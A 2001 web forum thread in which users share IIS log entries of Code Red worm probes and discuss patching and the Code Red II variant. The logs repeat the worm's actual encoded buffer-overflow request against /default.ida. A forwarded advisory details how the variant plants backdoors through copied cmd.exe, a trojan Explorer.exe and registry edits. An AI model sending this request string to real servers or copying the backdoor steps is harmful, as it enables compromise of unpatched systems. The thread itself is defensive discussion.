Jump to content
Compatible Support Forums
Sign in to follow this  
Atreyu

Code Red is still going strong.. Look at my log file!!

Recommended Posts

Here's my IIS(web) log file from August 4. Every hit with 'NNN..' AND 'XXXX..' IS Code Red. Notice it has changed from NNN to XXX.. meaning that it's mutating. I'm not in danger since I installed the patch weeks ago... but if every IIS server out there is getting scanned at least this many times per day.. and the worm is changing... we could be in for some interesting times!!

 

 

 

Sample:

 

2001-08-04 06:49:08 211.157.208.98 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 07:12:30 207.202.243.99 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 07:27:45 61.218.78.237 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 08:09:49 63.125.234.2 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 08:51:02 195.42.160.103 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 09:05:04 166.104.232.76 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 09:05:23 210.242.6.5 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 09:21:36 208.148.169.153 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 12:44:09 193.252.59.234 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 13:45:47 195.76.139.14 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 16:25:38 148.243.150.66 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 16:44:10 4.60.60.87 - 192.168.0.4 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 16:44:44 4.60.60.87 - 192.168.0.4 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 16:44:44 4.60.60.87 - 192.168.0.4 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 17:22:45 4.60.18.180 - 192.168.0.4 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 17:24:46 4.60.177.60 - 192.168.0.4 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 17:43:20 203.74.30.193 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

 

 

Click here to download the entire log file and see for yourself. Or heck, just open up your own and take a look.

Share this post


Link to post

Either way, that doesn't stop you from getting probed. It's just annoying as hell to me.

Share this post


Link to post

As clutch pointed out to me earlier too.. each hit came from a different server. So you can see the extent in which this worm has spread. It is really annoying to know that there is all this crap data out there on the net doing nothing but clogging it up and harming all these web servers.

 

Still, you have to marvel at it, and think to yourself how war in the future will be waged. I have a feeling it's gonna be country vs. country... trying to design worms and viruses intended to shut down the other's economy. Eh, whatever happens... the fact that one or two or three people can write a program like Code Red, and have it create havoc throughout the world... really is a frightening thought.

Share this post


Link to post

Oh, that's what Code Red is. I had a bunch of NNNNNNNNNNNNNNN.. in my log file too. I already applied the patch 2 weeks ago. So applying the patch will kill Code Red or what?

Share this post


Link to post

Well, it doesn't really "kill" it, it just prevents it from infecting YOUR system. All those hits you've been getting though are coming from systems that have been invected.

Share this post


Link to post

Here's another link about the mutation... it's apparently worse than the first one. This mutation cannot be "tracked".

Share this post


Link to post

Yikes, that X version i becoming veeery popular, the logs are full of attacks 8)

Share this post


Link to post

Well just got out of bed and took a look at my logs... looks like I was scanned nearly every 3 minutes last night.

Share this post


Link to post

I got this over the weekend at work:

 

I am posting a message about a new variant of the Code Red virus that

has started circulating.

This one is much worse and if you are infected, probably ought to

reformat.

 

This morning, AFAIK, a new Code Red variant was released.

 

------------------------------------------------------------------------

--

Ok, here's the latest on this new variant.

 

1. It makes a copy of CMD.EXE called ROOT.EXE in the;

 

\inetpub\scripts

 

and

 

\program files\common files\system\msadc

 

directories. Does this on both drive C: and D: (doesn't fail if D:

doesn't exist).

 

2. It then runs its attack program code to infect itself upon

numerous other boxes. This is done randomly, although there is a bias

to attack boxes that are part of the same class A as infected

attacker (so it hits your own boxes sooner rather than later). Attack

code runs for 24 hours, 48 hours on Chinese language systems.

 

3. After attack code runs (and it seems to be based on clock ticks,

not date), it then writes out a Trojan.

 

File Explorer.exe (8192bytes or 7K as displayed by Windows) is

dropped (from the code in the original attacking URL) to the root of

drive C: and D: (again, doesn't matter if D: doesn't exist).

 

4. The system is then rebooted (probably a forced reboot).

 

5. When the system restarts, it loads the trojan Explorer.exe from

the root directory on the boot drive. This code then does several

things;

 

a) Launches the real Explorer.exe, so the system looks normal.

 

B) Sets SFCDisable in hklm\software\microsoft\windows

nt\currentversion\winlogon to some undocumented value. Presumably

this disables Windows File Protection (so critical files could be

overwritten)

 

c) Creates two virtual directories (via the registry) in

hklm\system\currentcontrolset\services\w3svc\parameters\virtual

roots. Called "C" and "D", they are mapped to the root directories of

the two drives and permissions are established in the virtual

directory to allow script, read, and write access as well as setting

execute permissions to scripts and executables.

 

d) goes into an endless sleep loop.

 

The end result of all of this action is to leave your box wide open

to remote connection and total compromise.

 

Unlike "Code Red", this worm doesn't attack any single target at any

point, although its attack strength seems to be much higher (it

launches 300 threads right off, although some may only launch 100),

so its propagation seems much higher.

 

The attack only works properly on Windows 2000 systems (preliminary

analysis). ICSA Labs tested against an NT 4.0/IIS 4.0/SP3 box and

received a standard error message. Reports from subscribers suggest

that XP IIS 5.1 RC1 is invulnerable also. Its expected that it works

on PWS and OWS equally to IIS (all on W2K).

 

Its obviously a short-lived attack, at least the process of

collecting victims. What would be done with them once collected is

another story. No attempt is made by the worm to send anything

"home", although detecting compromised boxes is far too easy (very

unfortunately) for anyone outside your network.

 

Cleaning a compromised box should really be done by reformatting.

Although logging is left on for the new virtual directories created

(meaning you'd see access in your IIS logs), there's really no way to

be sure that files haven't been implanted to leave other backdoors

(not as part of this worm, but as part of the use of the opening it

creates).

 

Credits:

 

The bulk of the analysis was done by Nick Fitzgerald of Virus-L (and

friends) and Roger Thompson of TruSecure. Additional help came from

Bruce Hughes of the ICSA Labs.

 

Cheers,

Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

 

---------------------------------

Now Registering for IIS FastTrack

http:/www.iistraining.com

 

Brett Hill - IISAnswers.com

brett@iisanswers.com (303) 543-7502

MCSE MCT A+ Net+ CIW-TT

Share this post


Link to post

If IIS isn't installed are you still at risk? Cause I have Win2k Pro and Win2k Server on 2 machines, one is the server (Win2k Server) and only one that has direct access to net but IIS is not installed. Also does this affect Apache server?

Share this post


Link to post

According to EVERYTHING I have read... no, this does not apply to Apache server, only to Microsoft's IIS.

 

As far as your other question... as long as you're not running IIS you should be ok. This bug only attacks computers with an unpatched IIS 4.0 or 5.0. Later.

Share this post


Link to post

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
Sign in to follow this  

×